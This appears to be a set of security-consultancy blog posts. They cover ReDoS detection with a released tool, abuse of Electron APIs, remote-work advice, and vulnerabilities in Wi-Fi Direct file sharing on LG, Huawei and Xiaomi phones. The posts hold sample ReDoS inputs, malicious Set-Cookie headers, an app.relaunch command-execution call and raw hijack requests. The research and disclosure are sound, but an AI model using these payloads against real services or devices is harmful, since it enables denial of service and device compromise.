Regexploit: DoS-able Regular Expressions

When thinking of Denial of Service (DoS), we often focus on Distributed Denial of Service (DDoS) where millions of zombie machines overload a service by launching a tsunami of data. However, by abusing the algorithms a web application uses, an attacker can bring a server to its knees with as little as a single request. Doing that requires finding algorithms which have terrible performance under certain conditions, and then triggering those conditions. One widespread and frequently vulnerable area is in the misuse of regular expressions (regexes).

Regular expressions are used for all manner of text-processing tasks. They may seem to run fine, but if a regex is vulnerable to Regular Expression Denial of Service (ReDoS), it may be possible to craft input which causes the CPU to run at 100% for years.

In this blog post, we’re releasing a new tool to analyse regular expressions and hunt for ReDoS vulnerabilities. Our heuristic has been proven to be extremely effective, as demonstrated by many vulnerabilities discovered across popular NPM, Python and Ruby dependencies.

Check your regexes with Regexploit

🚀 @doyensec/regexploit - pip install regexploit and find some bugs.


To get into the topic, let’s review how the regex matching engines in languages like Python, Perl, Ruby, C# and JavaScript work. Let’s imagine that we’re using this deliberately silly regex to extract version numbers:


That will correctly process something like 123.456.789, but it’s a pretty inefficient regex. How does the matching process work?

The first .+ capture group greedily matches all the way to the end of the string as dot matches every character.


$1="123.456.789". The matcher then looks for a literal dot character. Unable to find it, it tries removing one character at a time from the first .+


until it successfully matches a dot - $1="123.456"


The second capture group matches the final three digits $2="789", but we need another dot so it has to backtrack.


Hmmm… it seems that maybe the match for capture group 1 is incorrect, let’s try backtracking.


OK let’s try with $1="123", and let’s match group 2 greedily all the way to the end.


$2="456.789" but now there’s no dot! That can’t be the correct group 2…


Finally we have a successful match: $1="123", $2="456", $3="789"

As you can hopefully see, there can be a lot of back-and-forth in the regex matching process. This backtracking is due to the ambiguous nature of the regex, where input can be matched in different ways. If a regex isn’t well-designed, malicious input can cause a much more resource-intensive backtracking loop than this.

If backtracking takes an extreme amount of time, it will cause a Denial of Service, such as what happened to Cloudflare in 2019. In runtimes like NodeJS, the Event Loop will be blocked which stalls all timers, awaits, requests and responses until regex processing completes.

ReDoS example

Now we can look at a ReDoS example. The ua-parser package contains a giant list of regexes for deciphering browser User-Agent headers. One of the regular expressions reported in CVE-2020-5243 was:

; *([^;/]+) Build[/ ]Huawei(MT1-U06|[A-Z]+\d+[^\);]+)[^\);]*\)

If we look closer at the end part we can see three overlapping repeating groups:


Digit characters are matched by \d and by [ˆ\);]. If a string of N digits enters that section, there are ½(N-1)N possible ways to split it up between the \d+, [ˆ\);]+ and [ˆ\);]* groups. The key to causing ReDoS is to supply input which doesn’t successfully match, such as by not ending our malicious input with a closing parenthesis. The regex engine will backtrack and try all possible ways of matching the digits in the hope of then finding a ).

This visualisation of the matching steps was produced by emitting verbose debugging from cpython’s regex engine using my cpython fork.


Today, we are releasing a tool called Regexploit to extract regexes from code, scan them and find ReDoS.

Several tools already exist to find regexes with exponential worst case complexity (regexes of the form (a+)+b), but cubic complexity regexes (a+a+a+b) can still be damaging. Regexploit walks through the regex and tries to find ambiguities where a single character could be captured by multiple repeating parts. Then it looks for a way to make the regular expression not match, so that the regex engine has to backtrack.

The regexploit script allows you to enter regexes via stdin. If the regex looks OK it will say “No ReDoS found”. With the regex above it shows the vulnerability:

Worst-case complexity: 3 ⭐⭐⭐ (cubic)
Repeated character: [[0-9]]
Example: ';0 Build/HuaweiA' + '0' * 3456

The final line of output gives a recipe for creating a User-Agent header which will cause ReDoS on sites using old versions of ua-parser, likely resulting in a Bad Gateway error.

User-Agent: ;0 Build/HuaweiA0000000000000000000000000000...

To scan your source code, there is built-in support for extracting regexes from Python, JavaScript, TypeScript, C#, JSON and YAML. If you are able to extract regexes from other languages, they can be piped in and analysed.

Once a vulnerable regular expression is found, it does still require some manual investigation. If it’s not possible for untrusted input to reach the regular expression, then it likely does not represent a security issue. In some cases, a prefix or suffix might be required to get the payload to the right place.

ReDoS Survey

So what kind of ReDoS issues are out there? We used Regexploit to analyse the top few thousand npm and pypi libraries (grabbed from the API) to find out.

pypi / npm downloader

We tried to exclude build tools and test frameworks, as bugs in these are unlikely to have any security impact. When a vulnerable regex was found, we then needed to figure out how untrusted input could reach it.


The most problematic area was the use of regexes to parse programming or markup languages. Using regular expressions to parse some languages e.g. Markdown, CSS, Matlab or SVG is fraught with danger. Such languages have grammars which are designed to be processed by specialised lexers and parsers. Trying to perform the task with regexes leads to overly complicated patterns which are difficult for mere mortals to read.

A recurring source of vulnerabilities was the handling of optional whitespace. As an example, let’s take the Python module CairoSVG which used the following regex:

rgba\([ \n\r\t]*(.+?)[ \n\r\t]*\)

$ regexploit-py .env/lib/python3.9/site-packages/cairosvg/
Vulnerable regex in .env/lib/python3.9/site-packages/cairosvg/ #190
Pattern: rgba\([ \n\r\t]*(.+?)[ \n\r\t]*\)
Context: RGBA = re.compile(r'rgba\([ \n\r\t]*(.+?)[ \n\r\t]*\)')
Starriness: 3 ⭐⭐⭐ (cubic)
Repeated character: [20,09,0a,0d]
Example: 'rgba(' + ' ' * 3456

The developer wants to find strings like rgba(   100,200, 10, 0.5   ) and extract the middle part without surrounding spaces. Unfortunately, the .+ in the middle also accepts spaces. If the string does not end with a closing parenthesis, the regex will not match, and we can get O(n3) backtracking.

Let’s take a look at the matching process with the input "rgba(" + " " * 19:

What a load of wasted CPU cycles!

A fun ReDoS bug was discovered in cpython’s http.cookiejar with this gorgeous regex:

Pattern: ^
    (\d\d?)            # day
    (\w+)              # month
    (\d+)              # year
          (?:\s+|:)    # separator before clock
       (\d\d?):(\d\d)  # hour:min
       (?::(\d\d))?    # optional seconds
    )?                 # optional clock
    ([-+]?\d{2,4}|(?![APap][Mm]\b)[A-Za-z]+)? # timezone
    (?:\(\w+\))?       # ASCII representation of timezone in parens.
Context: LOOSE_HTTP_DATE_RE = re.compile(
Starriness: 3 ⭐⭐⭐
Repeated character: [SPACE]
Final character to cause backtracking: [^SPACE]
Example: '0 a 0' + ' ' * 3456 + '0'

It was used when processing cookie expiry dates like Fri, 08 Jan 2021 23:20:00 GMT, but with compatibility for some deprecated date formats. The last 5 lines of the regex pattern contain three \s* groups separated by optional groups, so we have a cubic ReDoS.

A victim simply making an HTTP request like requests.get('http://evil.server') could be attacked by a remote server responding with Set-Cookie headers of the form:

Set-Cookie: b;Expires=1-c-1                        X

With the maximum 65506 spaces that can be crammed into an HTTP header line in Python, the client will take over a week to finish processing the header.

Again, the issue was designing the regex to handle whitespace between optional sections.

Another point to notice is that, based on the git history, the troublesome regexes we discovered had mostly remained untouched since they first entered the codebase. While it shows that the regexes seem to cause no issues in normal conditions, it perhaps indicates that regexes are too illegible to maintain. If the regex above had no comments to explain what it was supposed to match, who would dare try to alter it? Probably only the guy from xkcd.

xkcd 208: Regular Expressions Sorry, I wanted to shoehorn this comic in somewhere

Mitigations - Safety first

Use a DFA

So why didn’t I bother looking for ReDoS in Golang? Go’s regex engine re2 does not backtrack.

Its design (Deterministic Finite Automaton) was chosen to be safe even if the regular expression itself is untrusted. The guarantee is that regex matching will occur in linear time regardless of input. There was a trade-off though. Depending on your use-case, libraries like re2 may not be the fastest engines. There are also some regex features such as backreferences which had to be dropped. But in the pathological case, regexes won’t be what takes down your website. There are re2 libraries for many languages, so you can use it in preference to Python’s re module.

Don’t do it all with regexes

For the whitespace ambiguity issue, it’s often possible to first use a simple regex and then trim / strip the spaces from either side of the result.

How to meme?

Many tiny regexes

In Ruby, the standard library contains StringScanner which helps with “lexical scanning operations”. While the http-cookie gem has many more lines of code than a mega-regex, it avoids REDoS when parsing Set-Cookie headers. Once each part of the string has been matched, it refuses to backtrack. In some regular expression flavours, you can use “possessive quantifiers” to mark sections as non-backtrackable and achieve a similar effect.

Gotta catch ‘em all 🐛🐞🦠

Electron APIs Misuse: An Attacker’s First Choice

ElectronJs is getting more secure every day. Context isolation and other security settings are planned to become enabled by default with the upcoming release of Electron 12 stable, seemingly ending the somewhat deserved reputation of a systemically insecure framework.

Seeing such significant and tangible progress makes us proud. Over the past years we’ve committed to helping developers securing their applications by researching different attack surfaces:

As confirmed by the Electron development team in the v11 stable release, they plan to release new major versions of Electron (including new versions of Chromium, Node, and V8), approximately quarterly. Such an ambitious versioning schedule will also increase the number and the frequency of newly introduced APIs, planned breaking changes, and consequent security nuances in upcoming versions. While new functionalities are certainly desirable, new framework’s APIs may also expose powerful interfaces to OS features, which may be more or less inadvertently enabled by developers falling for the syntactic sugar provided by Electron.

Electron Hardened

Such interfaces may be exposed to the renderer’s, either through preloads or insecure configurations, and can be abused by an attacker beyond their original purpose. An infamous example of this is openExternal.

Shell’s openExternal() allows opening a given external protocol URI with the desktop’s native utilities. For instance, on macOS, this function is similar to the open terminal command utility and will open the specific application based on the URI and filetype association. When openExternal is used with untrusted content, it can be leveraged to execute arbitrary commands, as demonstrated by the following example:

const {shell} = require('electron') 

Similarly, shell.openPath(path) can be used to open the given file in the desktop’s default manner.

From an attacker’s perspective, Electron-specific APIs are very often the easiest path to gain remote code execution, read or write access to the host’s filesystem, or leak sensitive user’s data. Malicious JavaScript running in the renderer can often subvert the application using such primitives.

With this in mind, we gathered a non-comprehensive list of APIs we successfully abused during our past engagements. When exposed to the user in the renderer, these APIs can significantly affect the security posture of Electron-based applications and facilitate nodeIntegration / sandbox bypasses.

The remote module provides a way for the renderer processes to access APIs normally only available in the main process. In Electron, GUI-related modules (such as dialog, menu, etc.) are only available in the main process, not in the renderer process. In order to use them from the renderer process, the remote module is necessary to send inter-process messages to the main process.

While this seems pretty useful, this API has been a source of performance and security troubles for quite a while. As a result of that, the remote module will be deprecated in Electron 12, and eventually removed in Electron 14.

Despite the warnings and numerous articles on the topic, we have seen a few applications exposing to the renderer. The app object controls the full application’s event lifecycle and it is basically the heart of every Electron-based application.

Many of the functions exposed by this object can be easily abused, including but not limited to:

Taking the first function as a way of example, app.relaunch([options]) can be used to relaunch the app when the current instance exits. Using this primitive, it is possible to specify a set of options, including a execPath property that will be executed for relaunch instead of the current app along with a custom args array that will be passed as command-line arguments. This functionality can be easily leveraged by an attacker to execute arbitrary commands.{args: [], execPath: "/System/Applications/"});

Note that the relaunch method alone does not quit the app when executed, and it is also necessary to call app.quit() or app.exit() after calling the method to make the app restart.


Another frequently exported module is systemPreferences. This API is used to get the system preferences and emit system events, and can therefore be abused to leak multiple pieces of information on the user’s behavior and their operating system activity and usage patterns. The metadata subtracted through the module could be then abused to mount targeted attacks.

subscribeNotification, subscribeWorkspaceNotification

These methods could be used to subscribe to native notifications of macOS. Under the hood, this API subscribes to NSDistributedNotificationCenter. Before macOS Catalina, it was possible to register a global listener and receive all distributed notifications by invoking the CFNotificationCenterAddObserver function with nil for the name parameter (corresponding to the event parameter of subscribeNotification). The callback specified would be invoked anytime a distributed notification is broadcasted by any app. Following the release of macOS Catalina or Big Sur, in the case of sandboxed applications it is still possible to globally sniff distributed notifications by registering to receive any notification by name. As a result, many sensitive events can be sniffed, including but not limited to:

  • Screen locks/unlocks
  • Screen saver start/stop
  • Bluetooth activity/HID Devices
  • Volume (USB, etc) mount/unmount
  • Network activity
  • User file downloads
  • Newly Installed Applications
  • Opened Source Code Files
  • Applications in Use
  • Loaded Kernel Extensions
  • …and more from the installed application including sensitive information in them. Distributed notifications will always be public by design, and it was never correct to put sensitive information in them.

The latest NSDistributedNotificationCenter API also seems to be having intermittent problems with Big Sur and sandboxed application, so we expected to see more breaking changes in the future.

getUserDefault, setUserDefault

The getUserDefault function returns the value of key in NSUserDefaults, a macOS simple storage class that provides a programmatic interface for interacting with the defaults system. This systemPreferences method can be abused to return the Application’s or Global’s Preferences. An attacker may abuse the API to retrieve sensitive information including the user’s location and filesystem resources. As a matter of demonstration, getUserDefault can be used to obtain personal details of the targeted application user:

  • User’s most recent locations on the file system
    > Native.systemPreferences.getUserDefault("NSNavRecentPlaces","array")
    (5) ["/tmp/secretfile", "/tmp/SecretResearch", "~/Desktop/Cellar/NSA_files", "/tmp/", "~/Desktop/Invoices"]
  • User’s selected geographic location
    (10) ["48.40311", "11.74905", "0", "Europe/Berlin", "DE", "Freising", "Germany", "Freising", "Germany", "DEPRECATED IN 10.6"]

Complementarily, the setUserDefault method can be weaponized to set User’s Default for the Application Preferences related to the target application. Before Electron v8.3.0 [1], [2] these methods can only get or set NSUserDefaults keys in the standard suite.


A subtle example of a potentially dangerous native Electron primitive is shell.showItemInFolder. As the name suggests, this API shows the given file in a file manager.


Such seemingly innocuous functionality hides some peculiarities that could be dangerous from a security perspective.

On Linux (/shell/common/, Electron extracts the parent directory name, checks if the resulting path is actually a directory and then uses XDGOpen (xdg-open) to show the file in its location:

void ShowItemInFolder(const base::FilePath& full_path) {
  base::FilePath dir = full_path.DirName();
  if (!base::DirectoryExists(dir))

  XDGOpen(dir.value(), false, platform_util::OpenCallback());

xdg-open can be leveraged for executing applications on the victim’s computer.

“If a file is provided the file will be opened in the preferred application for files of that type” (

Because of the inherited time of check time of use (TOCTOU) condition caused by the time difference between the directory existence check and its launch with xdg-open, an attacker could run an executable of choice by replacing the folder path with an arbitrary file, winning the race introduced by the check. While this issue is rather tricky to be exploited in the context of an insecure Electron’s renderer, it is certainly a potential step in a more complex vulnerabilities chain.

On Windows (/shell/common/, the situation is even more tricky:

void ShowItemInFolderOnWorkerThread(const base::FilePath& full_path) {
  base::win::ScopedCoMem<ITEMIDLIST> dir_item;
  hr = desktop->ParseDisplayName(NULL, NULL,
                                 NULL, &dir_item, NULL);

  const ITEMIDLIST* highlight[] = {file_item};
  hr = SHOpenFolderAndSelectItems(dir_item, base::size(highlight), highlight,
 if (FAILED(hr)) {
 	if (hr == ERROR_FILE_NOT_FOUND) {
      ShellExecute(NULL, L"open", dir.value().c_str(), NULL, NULL, SW_SHOW);
    } else {
      LOG(WARNING) << " " << __func__ << "(): Can't open full_path = \""
                   << full_path.value() << "\""
                   << " hr = " << logging::SystemErrorCodeToString(hr);

Under normal circustances, the SHOpenFolderAndSelectItems Windows API (from shlobj_core.h) is used. However, Electron introduced a fall-back mechanism as the call mysteriously fails with a “file not found” exception on old Windows systems. In these cases, ShellExecute is used as a fallback, specifying “open” as the lpVerb parameter. According to the Windows Shell documentation, the “open” object verb launches the specified file or application. If this file is not an executable file, its associated application is launched.

While the exploitability of these quirks is up to discussions, these examples showcase how innoucous APIs might introduce OS-dependent security risks. In fact, Chromium has refactored the code in question to avoid the use of xdg-open altogether and leverage dbus instead.

The Electron APIs illustrated in this blog post are just a few notable examples of potentially dangerous primitives that are available in the framework. As Electron will become more and more integrated with all supported operating systems, we expect this list to increase over time. As we often repeat, know your framework (and its limitations) and adopt defense in depth mechanisms to mitigate such deficiencies.

As a company, we will continue to devote our 25% research time to secure the ElectronJS ecosystem and improve Electronegativity.

Psychology of Remote Work

This is the first in a series of non-technical blog posts aiming at discussing the opportunities and challenges that arise when running a small information security consulting company. After all, day to day life at Doyensec is not only about computers and stories of breaking bits.

The pandemic has deeply affected standard office work and forced us to immediately change our habits. In all probability, no one could have predicted that suddenly the office was going to be “moved”, and the new location is a living room. Remote work has been a hot topic for many years, however the current situation has certainly accelerated the adoption and forced companies to make a change.

At Doyensec, we’ve been a 100% remote company since day one. In this blog post, we’d like to present our best practices and also list some of the myths which surround the idea of remote work. This article is based on our personal experience and will hopefully help the reader to work at home more efficiently. There are no magic recipes here, just a collection of things that work for us.

5 standard rules we follow and 7 myths that we believe are false


Five Golden Rules

1. “Work” separated from the “Home” zone

The most effective solution is to work in a separate and dedicated room, which automatically becomes your office. It is important to physically separate somehow the workplace from the rest of the house, e.g. a screen, small bookcase or curtain. The worst thing you can do is work on the couch or bed where you usually rest. We try not to review source code from the place where we normally eat snacks, or debug an application in the same place we sleep. If possible, work at a desk. It will also be easier for you to mobilize yourself for a specific activity. Also, make sure that your household, especially your young children, do not play in your “office area”. It will be best if this “home office space” belongs exclusively to you.

2. The importance of a workplace

Prepare a desk with adequate lighting and a comfortable chair. We emphasize the need for a functional, ergonomic chair, and not simply an armchair. It’s about working effectively. The time to relax will come later. Arrange everything so that you work with ease. Notebooks and other materials should be tidied up on the desk and kept neat. This will be a clear, distinguishing feature of the work place. Family members should know that this is a work area from the way it looks. It will be easier for them to get used to the fact that instead of “going to work,” work related responsibilities will be performed at home. Also, this setup gives an opportunity to make security testing more efficient - for example by setting up bigger screens and ready to use testing equipment.

3. Control your time (establish a routine)

A flexible working time can be treacherous. There are times when an eight hour working day is sufficient to complete an important project. On the other hand, there are situations where various distractions can take attention away from an assigned task. In order to avoid this type of scenario, fixed working hours must be established. For example, some Doyensec employees use BeFocused and Timing apps to regulate their time. Intuitive and user friendly applications will help you balance your private and professional life and will also remind you when it’s time to take a break. Working long hours with no breaks is the main source of burnout.

4. Find excuses to leave your house (vary the routine)

Traditional work is usually based on a structured day spent in an office environment. The day is organized into work sessions and breaks. When working at home, on the other hand, time must be allotted for non-work related responsibilities on a more subjective basis. It is important for the routine to be elastic enough to include breaks for everything from physical activity (walks) to shopping (groceries) and social interaction. Leaving the house regularly is very beneficial. A break will bring on a refreshed perspective. The current pandemic is obviously the reason why people spend more time inside. Outside physical activities are very important to keep our minds fresh and a set of new endorphins is always welcome. As proof of evidence, our best bugs are usually discovered after a run or a walk outside!

5. Avoid distractions

While this sounds like simple and intuitive advice, avoiding distractions is actually really difficult! In general it’s good to turn off notifications on your computer or phone, especially while working. We trust our people and they don’t have to be immediately 100% reachable when working. As long as our consultants provide updates and results when needed, it is perfectly fine to shutdown email and other communication channels. Depending on personal preference, some individuals require complete silence, while others can accomplish their work while listening to music. If you belong to that category of people who cannot work in absolute silence and normal music levels are too intense, consider using white noise. There are applications available that you can use to create a neutral soundtrack that helps you to concentrate. You can easily follow our recommendation on Spotify: something calm, maybe jazz style or classy.


Seven Myths

Let’s now talk about some myths related to remote work:

1. Remote employees have no control over projects

At Doyensec, we have successfully delivered hundreds of projects that were done exclusively remotely. If we are delivering a small project, we usually allocate one security researcher who is able to start the project from scratch and deliver a high quality deliverable, but sometimes we have 2-3 consultants working on the same engagement and the outcome is of the same quality. Most of our communication goes through (PGP-encrypted) emails. An instant messenger can help a great deal when answers are needed quickly. The real challenge is in hiring the right people who can control the project regardless of their physical location. While employing people for our company, we look at both technical and project management skills. According to Jason Fried and Davis Heinemeier Hansson, 37 Signal co-founders, you shouldn’t hire people you don’t trust (Remote). We totally agree with this statement.

2. Remote employees cannot learn from colleagues

The obvious fact is that it is easier to learn when a colleague is physically in the same office and not on the other side of the screen, but we have learned to deal with this problem. Part of our organizational culture is a “screen sharing session” where two people working on the same project analyze source code and look for vulnerabilities together. During our weekly meetings, we also organize a session called “best bugs” where we all share the most interesting findings from a given week.

3. Remote work = lack of work & life balance?

If a person is not able to organize his/her work day properly, it is easy to drag out the work day from early in the morning to midnight instead of completing everything within the expected eight hours. Self discipline and iterative improvements are the key solutions for an effective day. Work/life balance is important, but who said that forcing a 9am-5pm schedule is the best way to work? Wouldn’t it be better to visit a grocery store or a gym in the middle of the day when no one is around and finish work in the evening?

4. Employees not under control

Healthy remote companies rely on trust. If they didn’t then they wouldn’t offer remote work opportunities in the first place. People working at home carry out their duties like everyone else. In fact, planning activities such as gym-workouts, family time, and hobbies is much easier thanks to the flexible schedule. You can freely organize your work day around important family matters or other responsibilities if necessary.

Companies should be focused on having better hiring processes and ensuring long-term retention instead of being over concerned about the risk of “remote slacking”. In fact, our experience in the past four years would actually suggest that it is more challenging to ensure a healthy work/life balance since our researchers are sufficiently motivated and love what they do.

5. Remote work means working outside the employer’s office

It should be understood that not all remote work is the same. If you work in customer service and receive regular calls from customers, for example, you might be working from a confined space in a separate room at home. Remote work means working outside the employer’s office. It can mean working in a co-working space, cafeteria, hotel or any other place where you have a good Internet connection.

6. Remote work is lonely

This one is a bit tricky since it’s technically true and false. It’s true that you usually sit at home and work alone, but in our security work we’re constantly exchanging information via e-mails, Mattermost, Signal, etc. We also have Hangouts video meetings where we can sync up. If someone feels personally isolated, we always recommend signing up for some activities like a gym, book club or other options where like-minded people associate. Lonely individuals are less productive over the long run. Compared to the traditional office model, remote work requires looking for friends and colleagues outside the company - which isn’t a bad thing after all.

7. Remote work is for everyone

We strongly believe that there are people who will still prefer an onsite job. Some individuals need constant contact with others. They also prefer the standard 9am-5pm work schedule. There is nothing wrong with that. People that are working remotely have to make more decisions on their own and need stronger self-discipline. Since they are unable to engage in direct consultation with co-workers, a reduction of direct communication occurs. Nevertheless, remote work will become something “normal” for an increasing number of people, especially for the Y and Z generation.

Novel Abuses On Wi-Fi Direct Mobile File Transfers

The Wi-Fi Direct specification (a.k.a. “peer-to-peer” or “P2P” Wi-Fi) turned 10 years old this past April. This 802.11 extension has been available since Android 4.0 through a dedicated API that interfaces with a devices’ built-in hardware which directly connects to each other via Wi-Fi without an intermediate access point. Multiple mobile vendors and early adopters of this technology quickly leveraged the standard to provide their products with a fast and reliable file transfer solution.

After almost a decade, a huge majority of mobile OEMs still rely on custom locked-in implementations for file transfer, even if large cross-vendors alliances (e.g. the “Peer-to-Peer Transmission Alliance”) and big players like Google (with the recent “Nearby Share” feature) are moving to change this in the near future.

During our research, three popular P2P file transfer implementations were studied (namely Huawei Share, LG SmartShare Beam, Xiaomi Mi Share) and all of them were found to be vulnerable due to an insecure shared design. While some groundbreaking research work attacking the protocol layer has already been presented by Andrés Blanco during Black Hat EU 2018, we decided to focus on the application layer of this particular class of custom UPnP service.

This blog post will cover the following topics:

A Recurrent Design Pattern

On the majority of OEMs solutions, mobile file transfer applications will spawn two servers:

  • A File Transfer Controller or Client (FTC), that will manage the majority of the pairing and transfer control flow
  • A File Transfer Server (FTS), that will check a session’s validity and serve the intended shared file

These two services are used for device discovery, pairing and sessions, authorization requests, and file transport functions. Usually they are implemented as classes of a shared parent application which orchestrate the entire transfer. These components are responsible for:

  1. Creating the Wi-Fi Direct network
  2. Using the standard UPnP phases to announce the device, the file service description (/description.xml), and events subscription
  3. Issuing a UPnP remote procedure call to create a transfer request with another peer
  4. Upon acceptance from the recipient, uploading the target file through an HTTP POST/PUT request to a defined location

An important consideration for the following abuses is that after a P2P Wi-Fi connection is established, its network interface (p2p-wlan0-0) is available to every application running on the user’s device having android.permission.INTERNET. Because of this, local apps can interact with the FTS and FTC services spawned by the file sharing applications on the local or remote device clients, opening the door to a multitude of attacks.

LG SmartShare Beam

Smartshare is a stock LG solution to connect their phones to other devices using Wi-Fi (DLNA, Miracast) or Bluetooth (A2DP, OPP). The Beam feature is used for file transfer among LG devices.

Just like other similar applications, an FTS ( FileTransferTransmitter in com.lge.wfds.service.send.tx) and an FTC (FileTransferReceiver in com.lge.wfds.service.send.rx) are spawned and listening on ports 54003 and 55003.

As a way of example, the following HTTP requests demonstrate the FTC and the FTS in action whenever a file transfer session between two parties is requested. First, the FTS performs a CreateSendSession SOAP action:

POST /FileTransfer/control.xml HTTP/1.1
Connection: Keep-Alive
Content-Type: text/xml; charset="utf-8"
Content-Length: 1025
SOAPACTION: "urn:schemas-wifialliance-org:service:FileTransfer:1#CreateSendSession"
<?xml version="1.0" encoding="UTF-8"?>
    xmlns:s="" s:encodingStyle="">
            <Transmitter>Doyensec LG G6 Phone</Transmitter>
            <SessionInformation>&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;&lt;MetaInfo
                xmlns:xsi=&quot;; xsi:schemaLocation=&quot;urn:wfa:filetransfer;&gt;&lt;Note&gt;1 and 4292012bytes File Transfer&lt;/Note&gt;&lt;Size&gt;4292012&lt;/Size&gt;&lt;NoofItems&gt;1&lt;/NoofItems&gt;&lt;Item&gt;&lt;Name&gt;CuteCat.jpg&lt;/Name&gt;&lt;Size&gt;4292012&lt;/Size&gt;&lt;Type&gt;image/jpeg&lt;/Type&gt;&lt;/Item&gt;&lt;/MetaInfo&gt;

The SessionInformation node embeds an entity-escaped standard Wi-Fi Alliance schema, urn:wfa:filetransfer, transmitting a CuteCat.jpg picture. The file name (MetaInfo/Item/Name) is displayed in the file transfer prompt to show to the final recipient the name of the transmitted file. By design, after the recipient’s confirmation, a CreateSendSessionResponse SOAP response will be returned:

HTTP/1.1 200 OK
Date: Sun, 01 Jun 2020 12:00:00 GMT
Connection: Keep-Alive
Content-Type: text/xml; charset="utf-8"
Content-Length: 404
SERVER: UPnPServer/1.0 UPnP/1.0 Mobile/1.0
<?xml version="1.0" encoding="UTF-8"?>
    xmlns:s="" s:encodingStyle="">

This will contain the TransportInfo destination port that will be used for the final transfer:

PUT /CuteCat.jpeg HTTP/1.1
User-Agent: LGMobile
Content-Length: 4292012
Connection: Keep-Alive
Content-Type: image/jpeg

.... .Exif..MM ...<redacted>

What could go wrong?

Unfortunately this design suffers many issues, such as:

  • A valid session ID isn’t required to finalize the transfer
    Once a CreateSendSessionResponse is issued, no authentication is required to push a file to the opened RX port. Since the DEFAULT_HTTPSERVER_PORT for the receiver is hardcoded to be 55432, any application running on the sender’s or recipient’s device can hijack the transfer and push an arbitrary file to the victim’s storage, just by issuing a valid PUT request. On top of that, the current Session IDs are easily guessable, since they are randomly chosen from a small pool (WfdsUtil.randInt(1, 100));
  • File names and type can be arbitrarily changed by the sender
    Since the transferred file name is never checked to reflect the one initially prompted to the user, it is possible for an attacker to specify a different file name or type from the one initially shown just by changing the PUT request path to an arbitrary value.
  • It is possible to send multiple files at once without user confirmation
    Once the RX port (DEFAULT_HTTPSERVER_PORT) is opened, it is possible for an attacker to send multiple files in a single transaction, without prompting any notification to the recipient.

Because of the above design issues, any malicious third-party application installed on one of the peers’ devices may influence or take over any communication initiated by the legit LG SmartShare applications, potentially hijacking legit file transfers. A wormable malicious application could abuse this insecure design to flood the local or remote victim waiting for a file transfer, effectively propagating its malicious APK without user interaction required. An attacker could also abuse this design to implant arbitrary files or evidence on a victim’s device.

Huawei Share

Huawei Share is another file sharing solution included in Huawei’s EMUI operating system, supporting both Huawei terminals and those of its second brand, Honor.

In Huawei Share, an FTS (FTSService in and an FTC (FTCService in are spawned and listening on ports 8058 and 33003. On a high level, the Share protocol resembles the LG SmartShare Beam mechanism, but without the same design flaws.

Unfortunately, the stumbling block for Huawei Share is the stability of the services: multiple HTTP requests that could respectively crash the FTCService or FTSService were identified. Since the crashes could be triggered by any third-party application installed on the user’s device and because of the UPnP General Event Notification Architecture (GENA) design itself, an attacker can still take over any communication initiated by the legit Huawei Share applications, stealing Session IDs and hijacking file transfers.

Abusing FTS/FTC Crashes

In the replicated attack scenario, Alice and Bob’s devices are connected and paired on a Direct Wi-Fi connection. Bob also unwittingly runs a malicious application with little or no privileges on his device. In this scenario, Bob initiates a file share through Huawei Share 1. His legit application will, therefore, send a CreateSession SOAP action through a POST request to Alice’s FTCService to get a valid SessionID, which will be used as an authorization token for the rest of the transaction. During a standard exchange, after Alice accepts the transfer on her device, a file share event notification (NOTIFY /evetSub) will fire to Bob’s FTSService. The FTSService will then be used to serve the intended file.

NOTIFY /evetSub HTTP/1.1
Content-Type: text/xml; charset="utf-8"
NT: upnp:event
NTS: upnp:propchange
SID: uuid:e9400170-a170-15bd-802e-165F9431D43F
SEQ: 1
Content-Length: 218
Connection: close
<?xml version="1.0" encoding="utf-8"?>
<e:propertyset xmlns:e="urn:schemas-upnp-org:event-1-0">

Since an inherent time span exists between the manual acceptance of the transfer by Alice and its start, the malicious application could perform a request with an ad-hoc payload to trigger a crash of FTSService 2 and subsequently bind to the same port its own FTSService 3. Because of the UPnP event subscription and notification protocol design, the NOTIFY event including the SessionID (1924435235 in the example above) can now be intercepted by the fake FTSService 4 and used by the malicious application to serve arbitrary files.

The crashes are undetectable both to the device’s user and to the file recipient. Multiple crash vectors using malformed requests were identified, making the service systemically weak and exploitable.

Xiaomi Mi Share

Introduced with MIUI 11, Xiaomi’s MiShare offers AirDrop-like file transfer features between Mi and Redmi phones. Recently this feature was extended to be compatible with devices produced by the “Peer-to-Peer Transmission Alliance” (including vendors with over 400M users such as Xiaomi, OPPO, Vivo, Realme, Meizu).

Due to this transition, MiShare internally features two different sets of APIs:

  • One using bare HTTP requests, with many RESTful routes
  • One using mainly Websockets Secure (WSS) and only a handful of HTTPS requests

The websocket-based API is currently used by default for transfers between Xiaomi Devices and this is the one we assessed. As in other P2P solutions, several minor design and implementation bugs were identified:

  • The JSON-encoded parcel sent via WSS specifying the file properties is trusted and its fileSize parameter is used to check if there is available space on the device left. Since this is the sender’s declared file size, a Denial of Service (DoS) exhausting the remaining space is possible.

  • Session tokens (taskId) are 19-digits long and a weak source of entropy (java.util.Random) is used to generate them.

  • Just like the other presented vendor solutions, any third-party application installed on the user’s device can meddle with MiShare’s exchange. While several DoS payloads crashing MiShare are also available, for this vendor the file transfer service is restarted very quickly, making the window of opportunity for an attack very limited.

On a brighter note, the Mi Share protocol design was hardened using per-session TLS certificates when communicating through WSS and HTTPS, limiting the exploitability of many security issues.


Some of the attacks described can be easily replicated in other existing mobile file transfer solutions. While the core technology has always been there, OEMs still struggle to defend their own P2P sharing flavors. Other common vulnerabilities found in the past include similar improper access control issues, path traversals, XML External Entity (XXE), improper file management, and monkey-in-the-middle (MITM) of the connection.

All vulnerabilities briefly described in this post were responsibly disclosed to the respective OEM security teams between April and June 2020.